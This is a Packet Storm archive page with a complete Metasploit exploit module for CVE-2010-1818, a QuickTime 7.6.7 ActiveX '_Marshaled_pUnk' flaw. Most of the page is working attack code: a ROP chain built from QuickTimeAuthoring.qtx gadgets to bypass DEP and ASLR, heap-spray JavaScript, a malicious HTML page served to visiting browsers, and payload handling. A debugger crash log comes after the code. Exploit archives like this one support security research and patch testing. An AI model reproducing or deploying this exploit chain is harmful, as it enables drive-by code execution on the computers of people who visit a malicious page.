what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution

Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
Posted Aug 30, 2010
Authored by Ruben Santamarta, jduck | Site metasploit.com

This Metasploit module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This Metasploit module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.

tags | exploit, arbitrary, code execution, activex
systems | windows, apple
advisories | CVE-2010-1818
SHA-256 | ad2a818e38de29a3d18064e2a155fb84222ea75ee5b000f0fd2526843600bd1b

Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution

Change Mirror Download
##
# $Id: apple_quicktime_marshaled_punk.rb 10196 2010-08-30 21:52:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Seh

include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => nil,
})

def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution',
'Description' => %q{
This module exploits a memory trust issue in Apple QuickTime
7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX
control will treat a supplied parameter as a trusted pointer. It will
then use it as a COM-type pUnknown and lead to arbitrary code execution.

This exploit utilizes a combination of heap spraying and the
QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not
opt-in to ASLR. As such, this module should be reliable on all Windows
versions.

NOTE: The addresses may need to be adjusted for older versions of QuickTime.
},
'Author' =>
[
'Ruben Santemarta', # original discovery
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10196 $',
'References' =>
[
[ 'CVE', '2010-1818' ],
[ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'AutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 384, # perhaps more?
'BadChars' => "", # none...
'DisableNops' => true,
'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov esp,ebp").encode_string, # fix esp up
},
'Platform' => 'win',
'Targets' =>
[
[ 'Apple QuickTime Player 7.6.7',
{
'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Aug 30 2010',
'DefaultTarget' => 0))
end

def on_request_uri(client, request)

return if ((p = regenerate_payload(client)) == nil)

print_status("Sending #{self.name} exploit HTML to #{client.peerhost}:#{client.peerport}...")

shellcode = Rex::Text.to_unescape(p.encoded)

# We will spray to this address, hopefully
spray_target = 0x15220c20

# This is where our happy little dll is loaded
# 677a0000 679ce000 QuickTimeAuthoring C:\Program Files\QuickTime\QTSystem\QuickTimeAuthoring.qtx
rop_mod_base = target.ret

sploit = [
spray_target - 8,

# This first piece of code points the stack pointer to our data!
# NOTE: eax, ecx, and esi all point to our spray at this point.
rop_mod_base + 0x79c12, # xchg eax,esp / pop edi / pop esi / ret

# The second one becomes the new program counter after stack flip.
rop_mod_base + 0x1e27, # pop ecx / ret
rop_mod_base + 0x170088, # the IAT addr for HeapCreate (becomes ecx)

# We get the address of HeapCreate from the IAT here.
rop_mod_base + 0x10244, # mov eax,[ecx] / ret

# Call HeapCreate to create the k-rad segment
rop_mod_base + 0x509e, # call eax
0x01040110, # flOptions (gets & with 0x40005)
0x01010101, # dwInitialSize
0x01010101, # dwMaximumSize

# Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base

# Set ebx to our adjustment
rop_mod_base + 0x307a, # pop ebx / ret
0x8000, # becomes ebx

# Adjust eax
rop_mod_base + 0xbfb5b, # add eax,ebx / ret

# Save our buffer pointer off to this address
rop_mod_base + 0x1e27, # pop ecx / ret
rop_mod_base + 0x2062d4, # something writable

# Write eax to the address
rop_mod_base + 0x8fd6, # mov [ecx], eax / ret

# Now we must copy our real payload into the buffer

# First, setup edi
rop_mod_base + 0x134fd5, # xchg eax,edi / ret

# Get ESI from EDI (which is now in EAX)
rop_mod_base + 0x103ff8, # push eax / pop esi / pop ebx / ret
0x41414141, # scratch (becomes ebx)

# Set ECX from the stack
rop_mod_base + 0x1e27, # pop ecx / ret
0x200 / 4, # dwords to copy :)

# copy it!
rop_mod_base + 0x778d2, # rep movsd / pop edi / pop esi / ret
0x41414141, # scratch (becomes edi)
0x41414141, # scratch (becomes esi)

# Re-load the buffer pointer address
rop_mod_base + 0x1e27, # pop ecx / ret
rop_mod_base + 0x2062d4, # something writable

# And the pointer value itself
rop_mod_base + 0x10244, # mov eax,[ecx] / ret

# Set ebx to our adjustment
rop_mod_base + 0x307a, # pop ebx / ret
0x42424242, # will be filled after array init

# Adjust eax
rop_mod_base + 0xbfb5b, # add eax,ebx / ret

# Jump!
rop_mod_base + 0x509e, # call eax

# eh? Hopefull we didn't reach here.
0xdeadbeef
]
sploit[27] = 8 + (sploit.length * 4)
sploit = sploit.pack('V*')
sploit << p.encoded
sploit = Rex::Text.to_unescape(sploit)

custom_js = <<-EOF
function Prepare()
{
var block = unescape("#{sploit}");

while(block.length < 0x200)
block += unescape("%u0000");

heap = new heapLib.ie(0x20000);
while(block.length < 0x80000)
block += block;

finalspray = block.substring(2, 0x80000 - 0x21);

for(var i = 0; i < 350; i++)
{
heap.alloc(finalspray);
}
}

function start()
{
var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>'
+ '</'+ 'object>';
document.getElementById('stb').innerHTML = obj;

Prepare();

var targ = #{spray_target};
var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'
+ '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ + '"' + '/>'
+ '</'+ 'object>';
document.getElementById('xpl').innerHTML = obj;
}
EOF

hl_js = heaplib(custom_js)

content = <<-EOF
<html>
<head>
<script language="javascript">
#{hl_js}
</script>
</head>
<body onload="start()">
<div id="stb"></div>
<div id="xpl"></div>
</body>
</html>
EOF

# ..
send_response(client, content, { 'Content-Type' => "text/html" })

# Handle the payload
handler(client)
end

end


=begin
(7fc.a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=15220c20 ebx=00134ca8 ecx=15220c18 edx=00134b98 esi=15220c20 edi=00134bfc
eip=deadbe01 esp=00134b7c ebp=00134b90 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
deadbe01 ?? ???
=end
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close